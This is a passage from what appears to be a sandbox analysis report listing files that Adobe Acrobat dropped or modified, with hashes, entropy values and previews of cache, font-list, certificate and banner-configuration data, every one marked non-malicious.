                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379069593015120","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":670285},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):4099
                                                                    Entropy (8bit):5.236077100766031
                                                                    Encrypted:false
                                                                    SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLU+AaQwK:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLG
                                                                    MD5:CA57E7B419AE7E916FC4CF5EE7311D0E
                                                                    SHA1:8F97D5A888A21B7F356A8FE04C20CEEEBCC693B1
                                                                    SHA-256:49F9A17D1728B0EB3A8AB730F2142F91290F72268E382471D4E5FEE94040B68C
                                                                    SHA-512:1C19AD9F2D322D59BAB2685D350483729E77ECF71EEE9EFF11B09520EF3F9C1F649FAFC218456AC42101A47D1E3C16F0121F99EA268292406FDAF4021C26FE43
                                                                    Malicious:false
                                                                    Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):326
                                                                    Entropy (8bit):5.155313047954811
                                                                    Encrypted:false
                                                                    SSDEEP:6:7BnKcfIjyq2P92nKuAl9OmbzNMxIFUt8OBnKC8/1Zmw+OBnKC8pRkwO92nKuAl9c:77IOv4HAa8jFUt8Op8/1/+Op8P5LHAab
                                                                    MD5:8188A820533C3940A5EE9E70AFE03A25
                                                                    SHA1:F8F1370F75CE5C80195C01DE07433365E79A94B2
                                                                    SHA-256:908AB0AE048265104E352E2EBA20816E5020218D7DC6BCAB071C5F4D41E04853
                                                                    SHA-512:F0333D797BBD3E62A3CB685081BCB93FF2B2C4489DC2D9BF7E301459B979FB76E01BADDD1D451539BE9E71DB85E258D29AE079857D34F56D866058A474B381DD
                                                                    Malicious:false
                                                                    Preview:2024/12/18-03:13:04.851 1c14 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/18-03:13:04.853 1c14 Recovering log #3.2024/12/18-03:13:04.853 1c14 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                    Category:dropped
                                                                    Size (bytes):65110
                                                                    Entropy (8bit):1.1217569600910675
                                                                    Encrypted:false
                                                                    SSDEEP:96:IMMNvEzMMT9M7ziVkMM1MMMMMMMMxMMM2MMM9MAMMBvMMneMMMzMMMMzMMMOfMQn:TOY
                                                                    MD5:4B9C650BD0BCA8ECB718BF230E45A493
                                                                    SHA1:8B7C0D60AC3B7CEB8E21C81736F9153A3B835ED7
                                                                    SHA-256:88A9087C40E02862B1FBB69BB995341B2F1DDBF91C527BC3552012400FFC16E3
                                                                    SHA-512:FF4892383ABE6645FB6983143B549C9548121B2C206DEFF54AE92C49EF9BC90AA6EFCD33B1F8EBBCFE171888B15E0C5A1F9A2677DE7F7743A0B4695059793998
                                                                    Malicious:false
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:Certificate, Version=3
                                                                    Category:dropped
                                                                    Size (bytes):1391
                                                                    Entropy (8bit):7.705940075877404
                                                                    Encrypted:false
                                                                    SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                    MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                    SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                    SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                    SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                    Malicious:false
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                    Category:dropped
                                                                    Size (bytes):71954
                                                                    Entropy (8bit):7.996617769952133
                                                                    Encrypted:true
                                                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                    Malicious:false
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):192
                                                                    Entropy (8bit):2.7425532007658724
                                                                    Encrypted:false
                                                                    SSDEEP:3:kkFklchKfllXlE/HT8kv37vNNX8RolJuRdxLlGB9lQRYwpDdt:kKFNT8m37VNMa8RdWBwRd
                                                                    MD5:966722F3EAFE518495B92E58002F7BB0
                                                                    SHA1:34C2129A65877ECF66FF5A12C1CBA259472B6C2B
                                                                    SHA-256:D9A427407715348F0EDA28A217B7A2854185B5A3F604766FA1D7FFB2E3895DD9
                                                                    SHA-512:D79B24105984A9FEAA4C078C56156417B73CAFA5D5BDF30107CCB0DF25BC2BA313978F466678B843AFD7819C63FA5F4BE274BB848FB90E827A390EDC780087E4
                                                                    Malicious:false
                                                                    Preview:p...... ........oQ..$Q..(....................................................... ..........W.....z..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):328
                                                                    Entropy (8bit):3.150184159866505
                                                                    Encrypted:false
                                                                    SSDEEP:6:kKuCbT9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:DbqDnLNkPlE99SNxAhUe/3
                                                                    MD5:39FF6D4BCC64A1A13420CF85E7668553
                                                                    SHA1:BA2A760E313AB36990EB6747B28E8A6B5973ADF7
                                                                    SHA-256:FA412D30A4554DEB1F351A9DC9B826380CD94EABCB7F1B61960B969C0EB4E450
                                                                    SHA-512:2EDF857F49BFFEB2FCD62AB82F8925AE7A8D718EEE30E9EE98BEBF398A2011C1F078A11C7DCB5FEE51A718CC08DB260A923BA75EC4E9BACBD21F3B9859E688DA
                                                                    Malicious:false
                                                                    Preview:p...... .........gC.$Q..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:PostScript document text
                                                                    Category:dropped
                                                                    Size (bytes):1233
                                                                    Entropy (8bit):5.233980037532449
                                                                    Encrypted:false
                                                                    SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                    MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                    SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                    SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                    SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                    Malicious:false
                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:PostScript document text
                                                                    Category:dropped
                                                                    Size (bytes):10880
                                                                    Entropy (8bit):5.214360287289079
                                                                    Encrypted:false
                                                                    SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                    MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                    SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                    SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                    SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                    Malicious:false
                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):295
                                                                    Entropy (8bit):5.312847565734726
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJM3g98kUwPeUkwRe9:YvXKXFVW7M1UYpW7/UnGMbLUkee9
                                                                    MD5:B5D15339306B877C48DD77BF60B5AC68
                                                                    SHA1:740048C8145F807381D9FCC38A958115BAC89DBD
                                                                    SHA-256:C5274F7BC5E8AD189431A560596871FA725D91FFC12270BCBF658C9AEE1AF630
                                                                    SHA-512:E6D19153A71BA82770B6B96DF1D10A263377FDE30E66982DCF2DB70996FFBD95878AED4C60059D9DE58C0544E7CAD0C5F49FF6CE3F603FB671C03C1A054EAC07
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):294
                                                                    Entropy (8bit):5.248599753794346
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfBoTfXpnrPeUkwRe9:YvXKXFVW7M1UYpW7/UnGWTfXcUkee9
                                                                    MD5:DC9A20EBCAC1FC4F9BA252C4E5E6F210
                                                                    SHA1:4178D17BD243D46B8D4D86F4D0ACE8F6F17773BA
                                                                    SHA-256:584ED21D0EDFB6833C45376D6C6AC76E529CD5FE7097652732D9034BB53525AD
                                                                    SHA-512:1389654713C14814EBF6E882FFE84B2FEE2D1455BB5CC0C2E3E5BD6C0B67AC832E360C7B8FEF50F440587D70D7548C74CB0F770C15EAAC89FA0C0C2F0974243B
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):294
                                                                    Entropy (8bit):5.227420828839944
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfBD2G6UpnrPeUkwRe9:YvXKXFVW7M1UYpW7/UnGR22cUkee9
                                                                    MD5:4A51D646ED33E38CA193571F2046BED4
                                                                    SHA1:C872783720D85918CEE016862F6391EF51B83882
                                                                    SHA-256:B09FC34579D8CFFFAE16143409FEEB268D61218B25D50C6D2A85380842859822
                                                                    SHA-512:48A2217E7E4C7AA6D023BA35082D94496E638D725EB658935223F1A102CA801F15B6054637CF9A3E2A099B63ABC9973EEFBAED152C2CF0AD37ECEB15E5C9A0B2
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):285
                                                                    Entropy (8bit):5.289967958455945
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfPmwrPeUkwRe9:YvXKXFVW7M1UYpW7/UnGH56Ukee9
                                                                    MD5:2CFD650F7C7DF9E14230B9AD469FC673
                                                                    SHA1:BD3046AB82F17030367152DCC0B142CE906E67AC
                                                                    SHA-256:B9DC3F0D33FA21C33B705670D0AA66201A6EA1192C84AC8054598B4577E95270
                                                                    SHA-512:6D8D519BB8E6D5421B8F4CF4BE446CDBC8DE5166A2EA9D898AD24FCC2828F117FB2F2B9D4BAE7E82918DF81C4CCE0F70A3DD5ED4802D882617A7686EC232445D
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):1123
                                                                    Entropy (8bit):5.685279316558241
                                                                    Encrypted:false
                                                                    SSDEEP:24:Yv6X06Fi/UspLgE9cQx8LennAvzBvkn0RCmK8czOCCSG:Yv3cshgy6SAFv5Ah8cv/G
                                                                    MD5:17738238D997972D5040D767715CF825
                                                                    SHA1:D5B21FDDA277FA0D11BDFA3826BFD5FAC9377002
                                                                    SHA-256:16E9D050F9999A51AEE4471F9210ADDBB32AED3260103C2337C071120E8329C2
                                                                    SHA-512:550FE8FF4596EE053EE686BAA002E8B9AD1FA915635448846740A9BE1D7F6A51270DC90E624DA6D8595B6AB63310518256491E25F3AE6D2BDA32754DB1AE23CD
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):289
                                                                    Entropy (8bit):5.233823588730251
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJf8dPeUkwRe9:YvXKXFVW7M1UYpW7/UnGU8Ukee9
                                                                    MD5:AFFD478AFE4B7E302E93984AB3BF69D7
                                                                    SHA1:D02C8C5C78E9D5651F0515C23099D062C0B8D025
                                                                    SHA-256:7CFD630F2F975894B8968511FE16FEC5CEA4731D6A71D29B723E91AAAEEA3ADB
                                                                    SHA-512:90C579F608DB81CA71EA17378F30FF3A7FDEDBD5EB7CFA4A1231338B888C248A3867E78DEFF444E26908B41DA8338C9D90314E5AD3DBAED6920CF652A5E42592
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):292
                                                                    Entropy (8bit):5.23576768217988
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfQ1rPeUkwRe9:YvXKXFVW7M1UYpW7/UnGY16Ukee9
                                                                    MD5:6DBF3271FE1776958CA2B006795D77F9
                                                                    SHA1:B308E84FEA0AB2824842F403E40F6D347B923201
                                                                    SHA-256:A03BD7CD0B0BA3D17198A0D98BE89D16CB02D30944A0074394FB93DA00EDE45C
                                                                    SHA-512:58439DBA8D83FE3F11B74009315ADA073F480BA5AB277694DB53D1A4FB6911E6EDA9FC89D3D222BFAB8B9807E5C2A4B8A49D4753C337D5D29DFDAC861CC75D75
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):289
                                                                    Entropy (8bit):5.255345817660176
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfFldPeUkwRe9:YvXKXFVW7M1UYpW7/UnGz8Ukee9
                                                                    MD5:49AB6E313046DC0B1E34EBA7280E9297
                                                                    SHA1:A58CDF25F40BF0DC7EF19368D58BC3AFBC167436
                                                                    SHA-256:DAE37FF20777D6933CC906107045BF79CB31DE0EA3BAA5250893032B428ED8DC
                                                                    SHA-512:84BB7D464EDE08805E34537F763F17A0FC07EAD259206A01421EB3024987D57D7B9853755466C9C2440554AB8FDD1CEA903A72E4333CF2C6D988FDEDA5C7D657
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):295
                                                                    Entropy (8bit):5.261534802941264
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfzdPeUkwRe9:YvXKXFVW7M1UYpW7/UnGb8Ukee9
                                                                    MD5:8FE527E74B8E1EC7928466BD936225D9
                                                                    SHA1:3B6D3EDEC705DEDA317EC9B73AA5A7FEC8A28E03
                                                                    SHA-256:B93A08E11DBB8B86C40453E136A204FBDEE382E9CB42B33401F32FD1EF10D662
                                                                    SHA-512:4DDE8E42538A831E1C0CAE130512AE0D083E84A25BFC02A55F5C9CB8503B4CDF9BB63B9C7E16096E2B6FD5EC8E0BC78543334D9F7AA053BE6A632A07A45A44AD
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):289
                                                                    Entropy (8bit):5.241518284503011
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfYdPeUkwRe9:YvXKXFVW7M1UYpW7/UnGg8Ukee9
                                                                    MD5:992D6B9E5B874BA0940A69A21D6D78F6
                                                                    SHA1:A2F26DEE352D078A57AF993527F1FD098AFB9F70
                                                                    SHA-256:D783AEF42324674F6642686BA8BF204B3111C29B2E271AD3BC98BE4AA82C634D
                                                                    SHA-512:FE92E214555C309EC0F235548640DD53B1BA6A1BBD9CECD6331822F4C0FCA4274669B3214E0D9EDACDA9AB8381CAFB477659E3F930FA691563B90F064270DAC6
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):284
                                                                    Entropy (8bit):5.227120403279144
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJf+dPeUkwRe9:YvXKXFVW7M1UYpW7/UnG28Ukee9
                                                                    MD5:A054F40C9A7085E7DF73DDA037002458
                                                                    SHA1:3BA3A646E46552E456382EB763F0E696C774D009
                                                                    SHA-256:3816FC0CEEEB65F4A47923A50E782AF5E1F1F3367FC0761950F3FA0E8FE5B037
                                                                    SHA-512:5B63B0BF7DDC3D3B5E2BF519BD6C9B4A78A881BD3909DEDC080D11FE7D535766B64AB2582C292EB4CB87C67446FC5D465EF962B7C7407B0410B189FF381D620B
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):291
                                                                    Entropy (8bit):5.225467318365856
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfbPtdPeUkwRe9:YvXKXFVW7M1UYpW7/UnGDV8Ukee9
                                                                    MD5:7CFF1DD6F66B96611A2AF7830E10BF15
                                                                    SHA1:2837029C621A5FDD4874B7A3C8D6180EFAA5CBD0
                                                                    SHA-256:FCF598596C063D02F71681F5352939784BE8C61012DA5431394CF527ECFEAB77
                                                                    SHA-512:15EEE25C694E6F9497F5884573727E3CECF1FD703E39D696F51CDDB6185BFAF16C7EBCA36095E454EEAC5BC7A719D6EBBE79F29BFE4BD089143D40002A9D3B4E
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
